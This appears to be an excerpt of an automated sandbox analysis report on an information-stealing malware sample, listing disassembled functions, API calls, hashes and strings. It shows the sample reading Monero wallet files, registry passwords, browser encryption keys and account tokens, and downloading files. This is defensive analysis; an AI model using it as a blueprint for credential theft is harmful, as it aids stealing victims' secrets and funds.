                              • Opcode Fuzzy Hash: 10a753f4cc810fb91b7d2921333899576602ae52a4c91ab7d64423c703bb8f84
                              • Instruction Fuzzy Hash: 47511030910648ABDB1AFF64DDD6AED7779AF10300F504018F4466F592DF386B46DBA2
                              Function 003312D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: ffc6fbbc9f6600ab99bbc130e786c7d71cd94bc70ae6f4b82800fd8cf4d8594d
                              • Instruction ID: c56a4d859b21bf4b8d60702d7eb513e2ed96c64e26e8daed98d1ddc73889c26e
                              • Opcode Fuzzy Hash: ffc6fbbc9f6600ab99bbc130e786c7d71cd94bc70ae6f4b82800fd8cf4d8594d
                              • Instruction Fuzzy Hash: 5CC1B4B590020DABCB15EF60DCC9FEA7778BF64304F104598F50AAB241EB70AA85DF91
                              Function 00334280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 003342EC
                              • lstrcat.KERNEL32(?,0109E080), ref: 0033430B
                              • lstrcat.KERNEL32(?,?), ref: 0033431F
                              • lstrcat.KERNEL32(?,0109D1E8), ref: 00334333
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 00338D90: GetFileAttributesA.KERNEL32(00000000,?,00321B54,?,?,0034564C,?,?,00340E1F), ref: 00338D9F
                                • Part of subcall function 00329CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00329D39
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                                • Part of subcall function 003393C0: GlobalAlloc.KERNEL32(00000000,003343DD,003343DD), ref: 003393D3
                              • StrStrA.SHLWAPI(?,0109E0F8), ref: 003343F3
                              • GlobalFree.KERNEL32(?), ref: 00334512
                                • Part of subcall function 00329AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329AEF
                                • Part of subcall function 00329AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00324EEE,00000000,?), ref: 00329B01
                                • Part of subcall function 00329AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329B2A
                                • Part of subcall function 00329AC0: LocalFree.KERNEL32(?,?,?,?,00324EEE,00000000,?), ref: 00329B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 003344A3
                              • StrCmpCA.SHLWAPI(?,003408D1), ref: 003344C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003344D2
                              • lstrcat.KERNEL32(00000000,?), ref: 003344E5
                              • lstrcat.KERNEL32(00000000,00340FB8), ref: 003344F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 3f919eca83ea4f9de0d7eec6202c16eb6a44d6624098d6fa8ced7078f2ae2558
                              • Instruction ID: 66fe93ab47c60b8f58328ac7fe3b67d6f40459c10c677e5843fa079236569103
                              • Opcode Fuzzy Hash: 3f919eca83ea4f9de0d7eec6202c16eb6a44d6624098d6fa8ced7078f2ae2558
                              • Instruction Fuzzy Hash: 237187B6900218ABDB15EBA4DCC5FEE7379AF58300F004598F605AB181EB75EB49CF91
                              Function 00321310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 003212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003212B4
                                • Part of subcall function 003212A0: RtlAllocateHeap.NTDLL(00000000), ref: 003212BB
                                • Part of subcall function 003212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003212D7
                                • Part of subcall function 003212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003212F5
                                • Part of subcall function 003212A0: RegCloseKey.ADVAPI32(?), ref: 003212FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0032134F
                              • lstrlen.KERNEL32(?), ref: 0032135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00321377
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00321465
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 003214EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 9c8e65cf7a315f5c6eb5415acb5f8031291f8ef5ab5a7c43ab8eb3920a046447
                              • Instruction ID: fa58aa4dca9ac7ac991ce6a81880cbdbae1e1a4ec8ab30b69ae9f4f3610ed7dc
                              • Opcode Fuzzy Hash: 9c8e65cf7a315f5c6eb5415acb5f8031291f8ef5ab5a7c43ab8eb3920a046447
                              • Instruction Fuzzy Hash: 6E5153B1D1011857CB16FB60DDD2BED737CAF54300F4041A8B64A6A081EF746B89DFA6
                              Function 003275D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 003272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0032733A
                                • Part of subcall function 003272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003273B1
                                • Part of subcall function 003272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0032740D
                                • Part of subcall function 003272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00327452
                                • Part of subcall function 003272D0: HeapFree.KERNEL32(00000000), ref: 00327459
                              • lstrcat.KERNEL32(00000000,003417FC), ref: 00327606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00327648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0032765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0032768F
                              • lstrcat.KERNEL32(00000000,00341804), ref: 003276A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003276D3
                              • lstrcat.KERNEL32(00000000,00341808), ref: 003276ED
                              • task.LIBCPMTD ref: 003276FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 4d774c005fd86fd5e9dd4fca9e0e91c6de75b8d34675e4ebc38a266bf0aa62c0
                              • Instruction ID: bc76bab4bcc88167c9b27d1c2b5be69e01c140a7a8f61db76cd069dbf3d37862
                              • Opcode Fuzzy Hash: 4d774c005fd86fd5e9dd4fca9e0e91c6de75b8d34675e4ebc38a266bf0aa62c0
                              • Instruction Fuzzy Hash: 1B313C71D01109DBCB06EBA8EC96DFE7778BB54301B144118F102BB2A1DB74A98ADF52
                              Function 00338100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0109E560,00000000,?,00340E2C,00000000,?,00000000), ref: 00338130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00338137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00338158
                              • __aulldiv.LIBCMT ref: 00338172
                              • __aulldiv.LIBCMT ref: 00338180
                              • wsprintfA.USER32 ref: 003381AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: ad50264c988f06c7ea03b868918d852b98a82478c5b8cbc615149c0abc5b38b2
                              • Instruction ID: 5f83ded23d00abeb2774198a2c085111a93c5c7911ef8eb40616a476908fa2fa
                              • Opcode Fuzzy Hash: ad50264c988f06c7ea03b868918d852b98a82478c5b8cbc615149c0abc5b38b2
                              • Instruction Fuzzy Hash: 90211DB1E44318ABDB00DFD8DD49FAEB7B8FB44B10F104509F605BB280D7B869058BA5
                              Function 003260A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                                • Part of subcall function 003247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                              • InternetOpenA.WININET(00340DF7,00000001,00000000,00000000,00000000), ref: 0032610F
                              • StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00326147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0032618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003261B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 003261DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0032620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00326249
                              • InternetCloseHandle.WININET(?), ref: 00326253
                              • InternetCloseHandle.WININET(00000000), ref: 00326260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 8f106f9683242385ea8df0a530e9eb356d89acdb87268fbbbf4031e7a9dfc1f9
                              • Instruction ID: 405e9ca773e51702bfccf7f1c625d2cc1a39c4ca88ce95befae9a55b122fdf95
                              • Opcode Fuzzy Hash: 8f106f9683242385ea8df0a530e9eb356d89acdb87268fbbbf4031e7a9dfc1f9
                              • Instruction Fuzzy Hash: E7514FB1900218ABDB21DF54DC86BEE77B8EF44701F108498F606BB1C1DBB46A89DF95
                              Function 003272D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0032733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003273B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0032740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00327452
                              • HeapFree.KERNEL32(00000000), ref: 00327459
                              • task.LIBCPMTD ref: 00327555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 86e3f51cb4596e67952aa68ce129d7e994328263e9b5aa1501b19970a7639007
                              • Instruction ID: 0005a13cd6b86155c10fc8d2bf502345b59c7ec84f062449629d97f96b992b90
                              • Opcode Fuzzy Hash: 86e3f51cb4596e67952aa68ce129d7e994328263e9b5aa1501b19970a7639007
                              • Instruction Fuzzy Hash: 33611BB5D042689BDB25DB50EC55FD9B7B8BF44300F0081E9E689AA141DBB06BC9CFA1
                              Function 0032BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0032BC9F
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0032BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0032BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0032BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 5d0034d008f3ce1b5fc0c3fd2452702e87365c7ef5178398dff065841d5dc472
                              • Instruction ID: 49ac24761d5bc8c904e1ae15a05c0331836914d63bcf3e44184426c5866555a2
                              • Opcode Fuzzy Hash: 5d0034d008f3ce1b5fc0c3fd2452702e87365c7ef5178398dff065841d5dc472
                              • Instruction Fuzzy Hash: BCB16172910608ABCB06FBA0DCD6EEE7778AF14300F404158F546BF091EF346A49DBA2
                              Function 00336770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
